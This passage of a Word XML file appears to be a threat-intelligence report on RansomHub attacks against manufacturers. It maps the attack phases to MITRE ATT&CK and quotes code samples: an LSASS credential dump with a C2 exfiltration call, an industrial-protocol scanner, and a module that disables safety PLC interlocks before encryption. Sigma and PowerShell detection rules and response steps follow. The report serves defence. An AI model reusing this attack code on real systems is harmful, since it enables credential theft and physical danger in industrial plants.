        <w:t xml:space="preserve">: RansomHub compromised a widely-used supplier portal to distribute malicious updates to hundreds of manufacturing companies simultaneously </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref70">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[70]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001AC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1dyywfrpktxa" w:id="27"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 2: Credential Harvesting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001AD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: T1003.001 - OS Credential Dumping: LSASS Memory </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref71">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[71]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001AE">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_af322tgsas6" w:id="28"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PowerShell Empire Script</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001AF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Credential extraction observed in multiple incidents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SHA256: 3a7b4e8d91f2c5e6a9b0d7f1e4c8b2a5d7e9f3c6b8a1e7d4f9c2b5a8e1d7c4b9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function Invoke-MemoryExtraction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$process = Get-Process lsass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$handle = [Win32]::OpenProcess(0x1F0FFF, $false, $process.Id)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$dumpFile = "C:\ProgramData\debug.dmp"</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[Win32]::MiniDumpWriteDump($handle, $process.Id,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[IO.FileStream]::new($dumpFile, 'Create'),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0x00000002, [IntPtr]::Zero, [IntPtr]::Zero,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[IntPtr]::Zero)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Exfiltrate via legitimate cloud service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$creds = Parse-MiniDump $dumpFile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Send-ToC2 -Data $creds -Method "OneDrive"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pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_b6qmv98utjac" w:id="29"/>
      <w:bookmarkEnd w:id="29"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 3: OT Network Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001CF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: T0840 - Network Connection Enumeration </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref72">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[72]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D0">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_hef5ra5ll5pr" w:id="30"/>
      <w:bookmarkEnd w:id="30"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Reconnaissance Tool</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001D1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Custom OT discovery tool found in RansomHub toolkit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Identifies industrial protocols and devices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import socket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import struct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from scapy.all import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class OTDiscovery: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def __init__(self):</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self.protocols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44818: "EtherNet/IP",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502: "Modbus",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102: "S7",</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2222: "DNP3",</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47808: "BACnet",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4840: "OPC UA"</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def scan_ot_network(self, network):</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discovered_devices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for port, protocol in self.protocols.items():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try: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Send protocol-specific discovery packet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response = self.send_discovery_packet(network, port, protocol)</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if response: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device_info = self.parse_response(response, protocol)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discovered_devices.append({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'ip': device_info['ip'],</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'protocol': protocol,</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'vendor': device_info['vendor'],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'model': device_info['model'],</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'firmware': device_info['firmware']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except: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continue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return discovered_devices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000218">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8lp73w8f1ku3" w:id="31"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Phase 4: ICS-Aware Ransomware Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000219">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: T0800 - Activate Firmware Update Mode </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref73">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[73]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021A">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vfmeh7ga7wjf" w:id="32"/>
      <w:bookmarkEnd w:id="32"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RansomHub ICS Module</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000021B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">// Decompiled RansomHub OT-specific module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Targets safety instrumented systems before encryption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class ICSRansomware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private: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vector&lt;string&gt; critical_processes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"FactoryTalk", "WinCC", "Wonderware", "Citect",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"RSLogix", "Unity", "TIA Portal"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public:</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void DisableSafetyInterlocks()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 Identify safety PLCs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auto safety_devices = FindDevicesByType("Safety_PLC");</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for (auto device : safety_devices)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 Force devices into programming mode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SendCommand(device.ip, "STOP_CPU");</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SendCommand(device.ip, "DOWNLOAD_MODE");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 Modify safety logic to always permit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ModifySafetyLogic(device, "FORCE_PERMIT_ALL");</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void EncryptWithOTAwareness()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 Encrypt IT systems first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EncryptFileSystems({"C:\\", "D:\\", "E:\\"});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Then target HMI and historian databases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EncryptOTSystems({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"C:\\ProgramData\\Wonderware\\",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"C:\\Program Files\\Rockwell\\",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"C:\\Siemens\\WinCC\\"</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Leave PLCs running but blind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DisableHMIConnections();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f26agbs9zfj5" w:id="33"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Mapping</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000026B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1s0kmmgqzpt5" w:id="34"/>
      <w:bookmarkEnd w:id="34"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Comprehensive TTP Matrix</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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b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T1195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Supplier portal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Supply chain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hyperlink w:anchor="ref74">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[74]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T1059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PowerShell Empire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Script block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hyperlink w:anchor="ref7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T1547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Registry run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Registry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hyperlink w:anchor="ref76">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[76]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Citrix Bleed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Patch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hyperlink w:anchor="ref77">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T1562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Disable security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Process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hyperlink w:anchor="ref78">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[78]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T1003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LSASS memory dump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Sysmon Event ID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hyperlink w:anchor="ref79">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[79]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OT network enumeration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ICS network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hyperlink w:anchor="ref80">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[80]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T1021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RDP to OT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Network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hyperlink w:anchor="ref81">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[81]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T0802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HMI screenshot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Screen recording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hyperlink w:anchor="ref82">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[82]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T0800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Firmware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Device state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hyperlink w:anchor="ref83">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[83]</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002AE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_8ce4z2nzpajy" w:id="35"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Manufacturing-Specific Techniques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b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">ICS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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Business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Inhibit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T0803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Safety interlocks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Unsafe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hyperlink w:anchor="ref84">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[84]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Impair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T0836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Production recipes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Quality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hyperlink w:anchor="ref85">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[85]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T0882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Historian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Compliance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hyperlink w:anchor="ref86">
              <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                <w:rPr>
                  <w:color w:val="1155cc"/>
                  <w:u w:val="single"/>
                  <w:rtl w:val="0"/>
                </w:rPr>
                <w:t xml:space="preserve">[86]</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_sottba8kwk5z" w:id="36"/>
      <w:bookmarkEnd w:id="36"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Detection &amp; Response</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_x5kcdwzf561q" w:id="37"/>
      <w:bookmarkEnd w:id="37"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Immediate Detection Opportunities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C7">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ekbz5ww8zcyo" w:id="38"/>
      <w:bookmarkEnd w:id="38"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Network-Based Detection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002C8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># Sigma Rule: RansomHub OT Discovery Activity</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Reference: [[87]](#ref87)</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title: Suspicious Industrial Protocol Scanning</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id: 7f3e9c2a-4b5d-8e1f-a2c3-d4e5f6a7b8c9</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status: stable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description: Detects RansomHub OT network discovery patterns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logsource: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product: zeek</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service: conn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detection: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protocol_scan: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dst_port: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- 44818  # EtherNet/IP</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- 502    # Modbus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- 102    # S7</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- 47808  # BACnet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timeframe: 60s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condition: protocol_scan | count(dst_ip) by src_ip &gt; 50</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level: high</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tags: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attack.discovery</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 attack.t0840</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002F3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xjik3u7w6f5n" w:id="39"/>
      <w:bookmarkEnd w:id="39"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint Detection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000002F4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"># RansomHub pre-ransomware behavior detection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Deploy via GPO to all Windows systems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$ransomhubIndicators =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'Processes' = @('svcupdate.exe', 'rhub.exe', 'crypt32.exe')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'Services' = @('SupplierUpdate', 'RHubSync', 'MSExchangeUpdate')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'RegistryKeys'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'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SupplierUpdate',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'HKLM:\SYSTEM\CurrentControlSet\Services\RHubSync'</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'NetworkConnections' = @('update-srv.com', '185.220.101.0/24')</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function Detect-RansomHub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foreach ($indicator in $ransomhubIndicators.GetEnumerator())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switch ($indicator.Key)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'Processes'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$indicator.Value | ForEach-Object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if (Get-Process -Name $_ -ErrorAction SilentlyContinue)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Write-Alert "RansomHub process detected: $_"</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'Services'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$indicator.Value | ForEach-Object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if (Get-Service -Name $_ -ErrorAction SilentlyContinue)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Write-Alert "RansomHub service detected: $_"</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pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_aqx91wvl8oqg" w:id="40"/>
      <w:bookmarkEnd w:id="40"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Response Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000332">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_elzovdt4w1o6" w:id="41"/>
      <w:bookmarkEnd w:id="41"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Immediate Actions (0-4 hours)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000333">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Isolate affected systems</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> from production networks </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref88">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[88]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000334">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Activate OT-specific IR team</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with manufacturing expertise </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref89">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[89]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000335">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Switch to manual control</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> where safely possible </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref90">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[90]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000336">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Preserve forensic evidence</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> before recovery attempts </w:t>
      </w:r>
      <w:hyperlink w:anchor="ref91">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">[91]</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000337">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Notify law enforcement</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
